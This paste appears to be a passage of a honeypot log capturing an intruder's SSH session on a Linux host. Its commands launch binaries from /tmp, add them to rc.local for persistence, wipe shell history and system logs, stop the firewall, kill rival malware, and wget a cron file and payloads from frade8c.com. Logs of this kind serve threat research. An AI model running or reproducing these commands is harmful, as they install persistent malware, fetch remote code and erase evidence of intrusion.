  683.     nohup /tmp/nhgbhhj > /dev/null 2>&1&
  684.     nohup /tmp/byv832 > /dev/null 2>&1&
  685.     echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  686.     echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  687.     echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  688.     echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  689.     echo "cd /tmp;./smarvtd" >> /etc/rc.local
  690.     echo "cd /tmp;./whitptabil" >> /etc/rc.local
  691.     echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  692.     echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  693.     echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  694.     echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  695.     echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  696.     echo "cd /etc;./smarvtd" >> /etc/rc.local
  697.     echo "cd /etc;./whitptabil" >> /etc/rc.local
  698.     echo "cd /etc;./gdmorpen" >> /etc/rc.local
  699.     echo "unset MAILCHECK" >> /etc/profile
  700.     cd /etc;chattr +i sfewfesfs
  701.     rm -rf /root/.bash_history
  702.     touch /root/.bash_history
  703.     history -r
  704.     cd /var/log > dmesg
  705.     cd /var/log > auth.log
  706.     cd /var/log > alternatives.log
  707.     cd /var/log > boot.log
  708.     cd /var/log > btmp
  709.     cd /var/log > cron
  710.     cd /var/log > cups
  711.     cd /var/log > daemon.log
  712.     cd /var/log > dpkg.log
  713.     cd /var/log > faillog
  714.     cd /var/log > kern.log
  715.     cd /var/log > lastlog
  716.     cd /var/log > maillog
  717.     cd /var/log > user.log
  718.     cd /var/log > Xorg.x.log
  719.     cd /var/log > anaconda.log
  720.     cd /var/log > yum.log
  721.     cd /var/log > secure
  722.     cd /var/log > wtmp
  723.     cd /var/log > utmp
  724.     cd /var/log > messages
  725.     cd /var/log > spooler
  726.     cd /var/log > sudolog
  727.     cd /var/log > aculog
  728.     cd /var/log > access-log
  729.     cd /root > .bash_history
  730.     history -c"
  731. 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] CMD: /etc/init.d/iptables stop
  732.     echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  733.     echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  734.     apt-get -y install wget
  735.     yum -y install wget
  736.     chmod 7777 / etc
  737.     killall -9 .IptabLes
  738.     killall -9 nfsd4
  739.     killall -9 profild.key
  740.     cd /etc;rm -rf dir fake.cfg
  741.     killall -9 nfsd
  742.     killall -9 DDosl
  743.     killall -9 lengchao32
  744.     killall -9 b26
  745.     killall -9 khelper
  746.     killall -9 Bill
  747.     killall -9 n26
  748.     killall -9 007
  749.     killall -9 codelove
  750.     killall -9 32
  751.     killall -9 m32
  752.     killall -9 m64
  753.     killall -9 64
  754.     killall -9 83BOT
  755.     killall -9 82BOT
  756.     killall -9 dos64
  757.     killall -9 dos32
  758.     killall -9 new6
  759.     killall -9 new4
  760.     killall -9 node24
  761.     killall -9 mimi
  762.     killall -9 nodeJR-1
  763.     killall -9 freeBSD
  764.     killall -9 ksapdd
  765.     killall -9 106
  766.     killall -9 09
  767.     killall -9 xsw
  768.     killall -9 syslogd
  769.     killall -9 skysapdd
  770.     killall -9 cupsddd
  771.     killall -9 ksapd
  772.     killall -9 atddd
  773.     killall -9 xfsdxd
  774.     killall -9 sfewfesfs
  775.     killall -9 gfhjrtfyhuf
  776.     killall -9 rewgtf3er4t
  777.     killall -9 fdsfsfvff
  778.     killall -9 smarvtd
  779.     killall -9 whitptabil
  780.     killall -9 gdmorpen
  781.     cd /etc;chattr -i 66
  782.     cd /root; chmod 7777 / etc
  783.     killall -9 minerd
  784.     killall -9 syn
  785.     killall -9 joudckfr
  786.     killall -9 www
  787.     killall -9 log
  788.     killall -9 .IptabLes
  789.     killall -9 .IptabLex
  790.     killall -9 .Mm2
  791.     killall -9 acpid
  792.     killall -9 m64
  793.     killall -9 ./QQ
  794.     killall -9 aabb
  795.     killall -9 g3
  796.     killall -9 S99local
  797.     killall -9 3
  798.     killall -9 pm
  799.     killall -9 qweasd
  800.     killall -9 tangtang
  801.     killall -9 imap-login
  802.     killall -9 xudp
  803.     killall -9 sshpa
  804.     killall -9 008
  805.     killall -9 txma
  806.     killall -9 mrdos64.b00
  807.     killall -9 mrdos32.b00
  808.     killall -9 kkpklp
  809.     killall -9 kiilp
  810.     killall -9 xin1
  811.     killall -9 jibateng
  812.     killall -9 syscore.sh
  813.     killall -9 syscore.sh
  814.     killall -9 syscore.sh
  815.     killall -9 .mimeo
  816.     killall -9 .mimeo
  817.     killall -9 .mimeo
  818.     killall -9 .mimeop
  819.     killall -9 .task1
  820.     killall -9 .mimeop
  821.     killall -9 .IptabLes
  822.     killall -9 .IptabLex
  823.     killall -9 .IptabLes
  824.     killall -9 .IptabLex
  825.     killall -9 .IptabLes
  826.     killall -9 .IptabLex
  827.     killall -9 .IptabLes
  828.     killall -9 .IptabLex
  829.     cd /root;rm -rf dir nohup.out
  830.     cd /etc;rm -rf dir fake.cfg
  831.     cd /etc;rm -rf dir cupsddd.*
  832.     cd /etc;rm -rf dir atddd.*
  833.     cd /etc;rm -rf dir ksapdd.*
  834.     cd /etc;rm -rf dir kysapdd.*
  835.     cd /etc;rm -rf dir sksapdd.*
  836.     cd /etc;rm -rf dir skysapdd.*
  837.     cd /etc;rm -rf dir xfsdxd.*
  838.     cd /etc;rm -rf dir fake.cfg
  839.     cd /etc;rm -rf dir cupsdd.*
  840.     cd /etc;rm -rf dir atdd.*
  841.     cd /etc;rm -rf dir ksapd.*
  842.     cd /etc;rm -rf dir kysapd.*
  843.     cd /etc;rm -rf dir sksapd.*
  844.     cd /etc;rm -rf dir skysapd.*
  845.     cd /etc;rm -rf dir xfsdx.*
  846.     cd /etc;rm -rf dir sfewfesfs
  847.     cd /etc;rm -rf dir gfhjrtfyhuf
  848.     cd /etc;rm -rf dir rewgtf3er4t
  849.     cd /etc;rm -rf dir fdsfsfvff
  850.     cd /etc;rm -rf dir smarvtd
  851.     cd /etc;rm -rf dir whitptabil
  852.     cd /etc;rm -rf dir gdmorpen
  853.     cd /etc;rm -rf dir sfewfesfs.*
  854.     cd /etc;rm -rf dir gfhjrtfyhuf.*
  855.     cd /etc;rm -rf dir rewgtf3er4t.*
  856.     cd /etc;rm -rf dir fdsfsfvff.*
  857.     cd /etc;rm -rf dir smarvtd.*
  858.     cd /etc;rm -rf dir whitptabil.*
  859.     cd /etc;rm -rf dir gdmorpen.*
  860.     cd /etc;rm -rf dir nhgbhhj.*
  861.     cd /tmp;rm -rf dir 1.*
  862.     cd /tmp;rm -rf dir 2.*
  863.     cd /tmp;rm -rf dir 3.*
  864.     cd /tmp;rm -rf dir 4.*
  865.     cd /tmp;rm -rf dir 5.*
  866.     cd /tmp;rm -rf dir jdhe
  867.     cd /tmp;rm -rf dir jdhe.*
  868.     cd /var/spool/cron; rm -rf dir root.*
  869.     cd /var/spool/cron; rm -rf dir root
  870.     cd /var/spool/cron/crontabs; rm -rf dir root.*
  871.     cd /var/spool/cron/crontabs; rm -rf dir root
  872.     cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  873.     cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  874.     yes|mv /tmp/root /var/spool/cron
  875.     yes|mv /tmp/root /var/spool/cron/crontabs
  876.     cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  877.     cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  878.     cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  879.     cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  880.     cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  881.     cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  882.     cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  883.     cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  884.     cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
RAW Paste Data